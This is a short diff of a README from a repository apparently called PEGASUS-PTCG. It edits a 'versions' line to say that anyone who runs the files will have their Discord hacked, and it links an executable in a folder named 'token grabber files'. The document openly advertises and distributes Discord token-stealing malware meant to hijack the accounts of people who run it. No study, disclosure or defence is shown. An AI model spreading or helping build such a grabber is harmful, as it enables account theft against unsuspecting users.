XKMR/PEGASUS-PTCG/README.md

 # VESIONS:

-if someone run this files, they will be hacked
+if someone run this files, they're discord will be hacked

 <a href="token%20grabber%20files/PTCG0.1.exe">PTCG0.1</a>
 <br/>